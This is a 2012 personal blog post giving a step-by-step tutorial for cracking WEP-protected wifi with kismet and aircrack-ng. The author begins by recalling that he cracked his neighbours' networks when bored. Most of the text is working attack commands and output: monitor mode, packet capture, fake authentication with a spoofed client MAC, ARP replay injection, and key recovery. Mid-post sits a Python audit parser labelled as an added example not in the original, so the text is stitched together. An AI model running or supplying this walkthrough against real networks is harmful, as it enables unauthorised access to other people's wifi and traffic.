29 October 2012

269. Your neighbours' WEP wifi and you

A few years ago, when I was living in an apartment block mainly inhabited by university students, I took to cracking the passwords to my neighbours' WEP 'protected' wifi networks whenever I got bored. Cracking WEP doesn't require much in terms of either brains or brawn, so it's admittedly not much of an accomplishment.

I'm writing this based on notes I wrote a long time ago to teach people in the lab how to do various 'interesting' things with computers. Partly because even as a chemist you need to be able to -- you encounter the odd computer with a Windows password or BIOS password which has been forgotten with time, but which is in a critical role, e.g. controlling an expensive instrument. Also, a fair number of research groups run their own wireless networks, and a lot of group leaders are barely computer literate. My pet theory is that this explains why so many of my colleagues use Macintosh...

So here's how to deal with WEP. The legality of this isn't questionable -- it is illegal to hack OTHER people's networks in most jurisdictions.

But here's a thought -- set up your own network and crack it for fun. Once you realise how easy it is you'll never look at WEP the same way again. You'll also understand why using a hidden SSID and MAC filtering doesn't do much to protect you.

Also, you'll most likely realise a few things which you can do to make it a little bit more troublesome to hack a WEP network (eventually it'll fall -- as will of course WPA2, although that often requires brute force cracking which can take anything from 1 s to millennia).

DON'T GET YOURSELF IN TROUBLE BY BREAKING THE LAW. Also, be nice to your neighbours.

Anyway, WEP.

You'll need aircrack-ng and you might want kismet.


Kismet is available in the repos
sudo apt-get install kismet

You will need to edit /etc/kismet/kismet.conf to set it up for your particular wireless card. I've got a Sabrent High-power wireless-N USB device with a nice little antenna:
Bus 002 Device 003: ID 148f:2870 Ralink Technology, Corp. RT2870 Wireless Adapter

So I put the following in my /etc/kismet/kismet.conf

source=rt73,wlan1,expt

Use kismet to snoop for WEP wifi networks and then get lists of associated clients:
sudo kismet


Once you've started it, hit s to sort, and w to sort by wep/wpa. Select the network you're interested in and hit i for information and c for a list of attached clients (good to know if they have MAC based filtering). Capital Q exits.

Note that you don't really NEED kismet. It just happens to be a good tool, so if you're stuck with figuring out how to set it up, you can skip this section.

Anyway, I found an AP with a BSSID of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number of associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C). The AP is using channel 1.


You do need Aircrack-ng.

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar xvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1/

Edit common.mak and change line 70 from
CFLAGS          ?= -g -W -Wall -Werror -O3

to
CFLAGS          ?= -g -W -Wall -O3

Compile and install:
make
sudo make install

You might get a fair number of warnings about variables being set (e.g. ndiswrapper) but not used; without -Werror they no longer abort the build. No worries.


If you were using network-manager you would now turn it off:
sudo service network-manager stop

If you're using your wireless card (i.e. have it set up) there's a long list of other things which may need to be stopped:
ps aux|grep dhclient
ps aux|grep wpa_supplicant
sudo service wicd stop
sudo service avahi-daemon stop


But if you haven't configured your external USB card and you're not using network-manager you don't need to stop anything, e.g. I only use my Sabrent card for kismet and aircrack so I don't need to stop anything.

We need a directory to work in:


mkdir ~/airscan
cd ~/airscan



Time to set up your card in monitor mode (wlan2 is my Sabrent, wlan0 is my wicd-controlled internal laptop wifi):
sudo airmon-ng start wlan2
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
2877    avahi-daemon
2878    avahi-daemon
4813    wpa_supplicant
4888    dhclient
Process with PID 4813 (wpa_supplicant) is running on interface wlan0
Process with PID 4888 (dhclient) is running on interface wlan0

Interface       Chipset                 Driver

wlan2           Ralink RT2870/3070      rt2800usb - [phy1]
                                        (monitor mode enabled on mon0)
wlan0           Unknown                 iwlwifi - [phy0]
Check that there's a monX interface:
sudo ifconfig
mon0      Link encap:UNSPEC  HWaddr 00-0D-0A-53-19-XX-3A-30-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:238 errors:0 dropped:238 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:16279 (15.8 KiB)  TX bytes:0 (0.0 B)
If you didn't use e.g. kismet above you can now scan the local environment using aireplay-ng (sudo aireplay-ng -9 mon0), although it often doesn't pick up all the networks which are accessible.


The attack

A. Anyway, using kismet we earlier found an AP with a BSSID of 00:1D:92:16:XX:XX (Micro-Star Int'l Co Ltd) and a number of associated clients, including one with a MAC of 00:04:ED:91:17:XX (Billion Electric C) and another with 00:13:E8:8E:46:XX (Intel). The AP is using channel 1.

sudo airodump-ng -c 1 --bssid 00:1D:92:16:XX:XX -w output mon0

If you get a message about the channel being fixed, then you failed to stop something earlier (e.g. dhclient, wpa_supplicant). If all went well you'll be looking at something like this:
 CH  1 ][ Elapsed: 0 s ][ 2012-10-28 18:37

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1D:92:16:XX:XX  -76   0       30        7    1   1  54e  WEP  WEP

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1D:92:16:XX:XX  00:13:E8:8E:46:XX  -77    2 -12e     1        5


Important things here:
1. Make sure you're listening to the right channel (first row).
2. The MAC addresses listed under 'STATION' are connected clients. Good to know if you want to do MAC spoofing.
3. The #Data column is what you will want to keep your eyes on. These are the data packets which you're after and which will help you crack the WEP password.

In theory this is all you need to do, and you could just go away for an hour or two while you're passively collecting data. In most cases, you will want to speed things up, however.
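If you run airodump-ng against your own network, the output above is worth parsing rather than eyeballing. The following is an added example (not part of the original post or of aircrack-ng) that reads the channel-locked airodump-ng text layout shown above and reports the two findings a network owner should act on: APs still on WEP or open, and the client MACs that MAC filtering would be trusting. The sample text is constructed from the capture above; the parser assumes the RXQ column is present (i.e. a -c capture, as here).

```python
import re
from collections import defaultdict

# Constructed sample in airodump-ng's channel-locked text layout; XX octets as on the page.
SAMPLE = """\
 CH  1 ][ Elapsed: 0 s ][ 2012-10-28 18:37
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:1D:92:16:XX:XX  -76   0       30        7    1   1  54e  WEP  WEP
 00:1D:92:AA:XX:XX  -60   0       42       12    2   6  54e  WPA2 CCMP   PSK  labnet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:1D:92:16:XX:XX  00:13:E8:8E:46:XX  -77    2 -12e     1        5
 00:1D:92:16:XX:XX  00:04:ED:91:17:XX  -80    1 - 1      0        2
"""

MAC = re.compile(r"^(?:[0-9A-FX]{2}:){5}[0-9A-FX]{2}$")  # X allowed for masked octets


def parse_airodump(text):
    """Return ({bssid: ap_info}, {bssid: [station_mac, ...]}).

    AP rows: BSSID PWR RXQ Beacons #Data #/s CH MB ENC [CIPHER AUTH ESSID]
    Station rows start with two MAC addresses (BSSID, STATION); the Rate
    field contains a space, so rows are told apart by shape, not by width.
    """
    aps, stations = {}, defaultdict(list)
    for line in text.splitlines():
        t = line.split()
        if len(t) < 2 or not MAC.match(t[0]):
            continue  # header, timestamp or blank line
        if MAC.match(t[1]):
            stations[t[0]].append(t[1])
        elif len(t) >= 9:
            essid = " ".join(t[11:]) if len(t) > 11 else ""  # empty or "<length: 0>" = hidden
            aps[t[0]] = {"ch": t[6], "data": int(t[4]), "enc": t[8], "essid": essid}
    return aps, stations


def audit(text):
    """Findings a network owner would act on, one string per issue."""
    aps, stations = parse_airodump(text)
    findings = []
    for bssid, ap in aps.items():
        if ap["enc"] in ("WEP", "OPN"):
            findings.append(f"{bssid}: {ap['enc']} on ch {ap['ch']}, {ap['data']} data frames "
                            f"captured, clients exposed for spoofing: {stations.get(bssid, [])}")
        if not ap["essid"] or ap["essid"].startswith("<length:"):
            findings.append(f"{bssid}: hidden SSID (the BSSID is still beaconed)")
    return findings
```

Feed it the text airodump-ng prints (or paste a saved screen) and you get one line per weak AP with the station list that a fake authentication would borrow a MAC from.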

B. To do that, in a second terminal run:

sudo aireplay-ng -1 0 -a 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one
The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:E8:8E:46:XX
18:39:40  Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1

18:39:40  Sending Authentication Request (Open System)
18:39:42  Sending Authentication Request (Open System)
18:39:44  Sending Authentication Request (Open System)
18:39:46  Sending Authentication Request (Open System)
18:39:48  Sending Authentication Request (Open System)
18:39:48  Authentication successful
18:39:48  Sending Association Request
18:39:48  Association successful :-) (AID: 1)

and in a third terminal run:
sudo aireplay-ng -3 -b 00:1D:92:16:XX:XX -h 00:13:E8:8E:46:XX mon0 --ignore-negative-one
The interface MAC (00:0D:0A:53:19:XX) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:E8:8E:46:XX
18:53:56  Waiting for beacon frame (BSSID: 00:1D:92:16:XX:XX) on channel 1
Saving ARP requests in replay_arp-1028-185356.cap
You should also start airodump-ng to capture replies.
Read 16660 packets (got 3 ARP requests and 18 ACKs), sent 7334 packets...(500 pps)
To be honest I don't know what the effect of this is like on the user whose MAC you are spoofing. I tend to stir things up for five minutes, then stop, wait ten minutes, then another five minutes, and it works quite ok. Also, sometimes you get higher data rates when you're NOT trying to push it. Each network is a little bit different.

It should also now be obvious to you that filtering your wireless based on MAC really doesn't protect your network at all -- as soon as a client connects you've given a usable MAC address away. Same goes for hidden SSIDs. Your ONLY recourse is choosing a good password and not using WEP.

C. Once you've started capturing data (see A) you can start cracking:

In a fourth terminal run the following (and leave it running -- it'll periodically re-run when there's enough new data):
sudo aircrack-ng -b 00:1D:92:16:XX:XX output*.cap
                                 Aircrack-ng 1.1 r1892

                 [01:49:20] Tested 27854 keys (got 10135 IVs)

   KB    depth   byte(vote)
    0    0/ 24   6D(14592) A1(14592) D2(14592) 9E(14336) BA(14336) 26(14080) 13(13824) B4(13824) AE(13312) B2(13312) DF(13056)
    1    3/  5   93(14080) CE(13568) 4C(13312) 7E(13312) 93(13312) E6(13312) 16(13056) BB(13056) E3(13056) F0(13056) 17(12800)
    2    2/  3   67(15104) 57(13824) B8(13568) 22(13312) 4B(13312) B3(13312) EB(13312) 73(13056) 76(13056) C0(13056) D7(13056)
    3    1/ 12   69(14848) 71(14592) 30(14592) 96(14080) A4(13568) 1D(13568) 35(13568) 8F(13312) B8(13056) E4(13056) 5F(13056)
    4    4/  8   63(13824) 2E(13568) E6(13568) ED(13568) 80(13312) AD(13312) C6(13312) EC(13312) 1C(12800) 21(12800) 7A(12800)

             KEY FOUND! [ 6D:61:67:69:63 ] (ASCII: magic )
        Decrypted correctly: 100%
Typically you won't have much luck until you have 5-20k IVs. Sometimes that's quick and easy (I've cracked APs in 3-4 minutes), sometimes it's slow and cumbersome (can take hours doing passive snooping).

And that's how easy WEP is to break. Don't use it.
